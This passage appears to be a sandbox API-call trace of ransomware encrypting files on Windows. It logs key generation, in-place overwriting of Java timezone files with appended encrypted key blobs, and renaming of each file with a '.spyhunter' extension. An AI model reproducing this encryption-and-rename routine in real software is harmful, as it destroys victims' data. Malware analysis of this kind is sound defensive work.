(lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0168.852] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57e6d0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57e6d0*=0x2ac, lpOverlapped=0x0) returned 1 [0168.852] CloseHandle (hObject=0xa0) returned 1 [0168.852] GetProcessHeap () returned 0x2c0000 [0168.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7db30 | out: hHeap=0x2c0000) returned 1 [0168.852] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e670 | out: pbBuffer=0x57e670) returned 1 [0168.852] GetProcessHeap () returned 0x2c0000 [0168.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0168.852] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e668*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e668*=0x30) returned 1 [0168.852] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Sydney" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\sydney"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0168.853] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Sydney") returned 60 [0168.853] StrStrW (lpFirst="Sydney", lpSrch=".txt") returned 0x0 [0168.853] GetProcessHeap () returned 0x2c0000 [0168.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0168.853] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e62c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57e62c*=0x4c8, lpOverlapped=0x0) returned 1 [0168.875] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffb38, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.875] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x4c8, lpNumberOfBytesWritten=0x57e62c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57e62c*=0x4c8, lpOverlapped=0x0) returned 1 [0168.875] GetProcessHeap () returned 0x2c0000 [0168.875] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0168.875] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.875] WriteFile (in: hFile=0xa0, lpBuffer=0x57e66c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e62c, lpOverlapped=0x0 | out: lpBuffer=0x57e66c*, lpNumberOfBytesWritten=0x57e62c*=0x4, lpOverlapped=0x0) returned 1 [0168.875] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e62c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e62c*=0x30, lpOverlapped=0x0) returned 1 [0168.876] CloseHandle (hObject=0xa0) returned 1 [0168.876] GetProcessHeap () returned 0x2c0000 [0168.876] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0168.876] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Sydney.spyhunter") returned 70 [0168.876] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Sydney" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\sydney"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Sydney.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\sydney.spyhunter")) returned 1 [0168.877] GetProcessHeap () returned 0x2c0000 [0168.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0168.877] GetProcessHeap () returned 0x2c0000 [0168.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0168.877] GetProcessHeap () returned 0x2c0000 [0168.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebbc68 | out: hHeap=0x2c0000) returned 1 [0168.877] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e668 | out: pbBuffer=0x57e668) returned 1 [0168.877] GetProcessHeap () returned 0x2c0000 [0168.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0168.877] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e660*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e660*=0x30) returned 1 [0168.877] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Lindeman" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\lindeman"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0168.884] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Lindeman") returned 62 [0168.884] StrStrW (lpFirst="Lindeman", lpSrch=".txt") returned 0x0 [0168.884] GetProcessHeap () returned 0x2c0000 [0168.884] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0168.884] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e624, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57e624*=0xdd, lpOverlapped=0x0) returned 1 [0168.884] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffff23, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.884] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xdd, lpNumberOfBytesWritten=0x57e624, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57e624*=0xdd, lpOverlapped=0x0) returned 1 [0168.885] GetProcessHeap () returned 0x2c0000 [0168.885] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0168.885] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.885] WriteFile (in: hFile=0x9c, lpBuffer=0x57e664*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e624, lpOverlapped=0x0 | out: lpBuffer=0x57e664*, lpNumberOfBytesWritten=0x57e624*=0x4, lpOverlapped=0x0) returned 1 [0168.885] WriteFile (in: hFile=0x9c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e624, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e624*=0x30, lpOverlapped=0x0) returned 1 [0168.885] CloseHandle (hObject=0x9c) returned 1 [0168.885] GetProcessHeap () returned 0x2c0000 [0168.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0168.885] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Lindeman.spyhunter") returned 72 [0168.885] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Lindeman" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\lindeman"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Lindeman.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\lindeman.spyhunter")) returned 1 [0168.888] GetProcessHeap () returned 0x2c0000 [0168.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0168.888] GetProcessHeap () returned 0x2c0000 [0168.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0168.888] GetProcessHeap () returned 0x2c0000 [0168.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebba10 | out: hHeap=0x2c0000) returned 1 [0168.888] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e668 | out: pbBuffer=0x57e668) returned 1 [0168.888] GetProcessHeap () returned 0x2c0000 [0168.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0168.888] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e660*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e660*=0x30) returned 1 [0168.888] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Eucla" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\eucla"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0168.889] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Eucla") returned 59 [0168.889] StrStrW (lpFirst="Eucla", lpSrch=".txt") returned 0x0 [0168.889] GetProcessHeap () returned 0x2c0000 [0168.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0168.889] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e624, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57e624*=0xcd, lpOverlapped=0x0) returned 1 [0168.890] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffff33, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.890] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xcd, lpNumberOfBytesWritten=0x57e624, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57e624*=0xcd, lpOverlapped=0x0) returned 1 [0168.890] GetProcessHeap () returned 0x2c0000 [0168.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0168.890] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.890] WriteFile (in: hFile=0x9c, lpBuffer=0x57e664*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e624, lpOverlapped=0x0 | out: lpBuffer=0x57e664*, lpNumberOfBytesWritten=0x57e624*=0x4, lpOverlapped=0x0) returned 1 [0168.890] WriteFile (in: hFile=0x9c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e624, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e624*=0x30, lpOverlapped=0x0) returned 1 [0168.890] CloseHandle (hObject=0x9c) returned 1 [0168.890] GetProcessHeap () returned 0x2c0000 [0168.891] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0168.891] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Eucla.spyhunter") returned 69 [0168.891] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Eucla" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\eucla"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Eucla.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\eucla.spyhunter")) returned 1 [0168.891] GetProcessHeap () returned 0x2c0000 [0168.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0168.891] GetProcessHeap () returned 0x2c0000 [0168.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0168.891] GetProcessHeap () returned 0x2c0000 [0168.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebdb80 | out: hHeap=0x2c0000) returned 1 [0168.892] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e660 | out: pbBuffer=0x57e660) returned 1 [0168.892] GetProcessHeap () returned 0x2c0000 [0168.892] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0168.892] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e658*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e658*=0x30) returned 1 [0168.892] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Darwin" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\darwin"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0168.892] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Darwin") returned 60 [0168.892] StrStrW (lpFirst="Darwin", lpSrch=".txt") returned 0x0 [0168.892] GetProcessHeap () returned 0x2c0000 [0168.892] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0168.892] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e61c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57e61c*=0x7d, lpOverlapped=0x0) returned 1 [0168.893] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffff83, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.893] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x7d, lpNumberOfBytesWritten=0x57e61c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57e61c*=0x7d, lpOverlapped=0x0) returned 1 [0168.893] GetProcessHeap () returned 0x2c0000 [0168.893] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0168.893] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.893] WriteFile (in: hFile=0x9c, lpBuffer=0x57e65c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e61c, lpOverlapped=0x0 | out: lpBuffer=0x57e65c*, lpNumberOfBytesWritten=0x57e61c*=0x4, lpOverlapped=0x0) returned 1 [0168.894] WriteFile (in: hFile=0x9c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e61c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e61c*=0x30, lpOverlapped=0x0) returned 1 [0168.894] CloseHandle (hObject=0x9c) returned 1 [0168.894] GetProcessHeap () returned 0x2c0000 [0168.894] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0168.894] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Darwin.spyhunter") returned 70 [0168.894] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Darwin" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\darwin"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Darwin.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\darwin.spyhunter")) returned 1 [0168.895] GetProcessHeap () returned 0x2c0000 [0168.895] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0168.895] GetProcessHeap () returned 0x2c0000 [0168.895] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0168.895] GetProcessHeap () returned 0x2c0000 [0168.895] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebb880 | out: hHeap=0x2c0000) returned 1 [0168.895] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e660 | out: pbBuffer=0x57e660) returned 1 [0168.895] GetProcessHeap () returned 0x2c0000 [0168.895] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0168.895] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e658*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e658*=0x30) returned 1 [0168.895] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Currie" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\currie"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0168.895] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Currie") returned 60 [0168.895] StrStrW (lpFirst="Currie", lpSrch=".txt") returned 0x0 [0168.895] GetProcessHeap () returned 0x2c0000 [0168.895] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0168.896] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e61c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57e61c*=0x4c8, lpOverlapped=0x0) returned 1 [0168.928] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffb38, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.928] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x4c8, lpNumberOfBytesWritten=0x57e61c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57e61c*=0x4c8, lpOverlapped=0x0) returned 1 [0168.929] GetProcessHeap () returned 0x2c0000 [0168.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0168.929] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.929] WriteFile (in: hFile=0x9c, lpBuffer=0x57e65c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e61c, lpOverlapped=0x0 | out: lpBuffer=0x57e65c*, lpNumberOfBytesWritten=0x57e61c*=0x4, lpOverlapped=0x0) returned 1 [0168.929] WriteFile (in: hFile=0x9c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e61c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e61c*=0x30, lpOverlapped=0x0) returned 1 [0168.929] CloseHandle (hObject=0x9c) returned 1 [0168.929] GetProcessHeap () returned 0x2c0000 [0168.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0168.929] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Currie.spyhunter") returned 70 [0168.929] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Currie" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\currie"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Currie.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\currie.spyhunter")) returned 1 [0168.930] GetProcessHeap () returned 0x2c0000 [0168.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0168.930] GetProcessHeap () returned 0x2c0000 [0168.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0168.930] GetProcessHeap () returned 0x2c0000 [0168.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebb7b8 | out: hHeap=0x2c0000) returned 1 [0168.930] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e658 | out: pbBuffer=0x57e658) returned 1 [0168.930] GetProcessHeap () returned 0x2c0000 [0168.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0168.932] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e650*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e650*=0x30) returned 1 [0168.932] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Brisbane" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\brisbane"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0168.932] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Brisbane") returned 62 [0168.932] StrStrW (lpFirst="Brisbane", lpSrch=".txt") returned 0x0 [0168.932] GetProcessHeap () returned 0x2c0000 [0168.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0168.933] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e614, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57e614*=0xbd, lpOverlapped=0x0) returned 1 [0168.933] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffff43, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.934] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xbd, lpNumberOfBytesWritten=0x57e614, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57e614*=0xbd, lpOverlapped=0x0) returned 1 [0168.934] GetProcessHeap () returned 0x2c0000 [0168.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0168.934] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.934] WriteFile (in: hFile=0x9c, lpBuffer=0x57e654*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e614, lpOverlapped=0x0 | out: lpBuffer=0x57e654*, lpNumberOfBytesWritten=0x57e614*=0x4, lpOverlapped=0x0) returned 1 [0168.934] WriteFile (in: hFile=0x9c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e614, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e614*=0x30, lpOverlapped=0x0) returned 1 [0168.934] CloseHandle (hObject=0x9c) returned 1 [0168.934] GetProcessHeap () returned 0x2c0000 [0168.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0168.934] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Brisbane.spyhunter") returned 72 [0168.934] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Brisbane" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\brisbane"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Brisbane.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\brisbane.spyhunter")) returned 1 [0168.935] GetProcessHeap () returned 0x2c0000 [0168.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0168.935] GetProcessHeap () returned 0x2c0000 [0168.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0168.935] GetProcessHeap () returned 0x2c0000 [0168.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebb6f0 | out: hHeap=0x2c0000) returned 1 [0168.935] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e658 | out: pbBuffer=0x57e658) returned 1 [0168.935] GetProcessHeap () returned 0x2c0000 [0168.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0168.936] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e650*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, 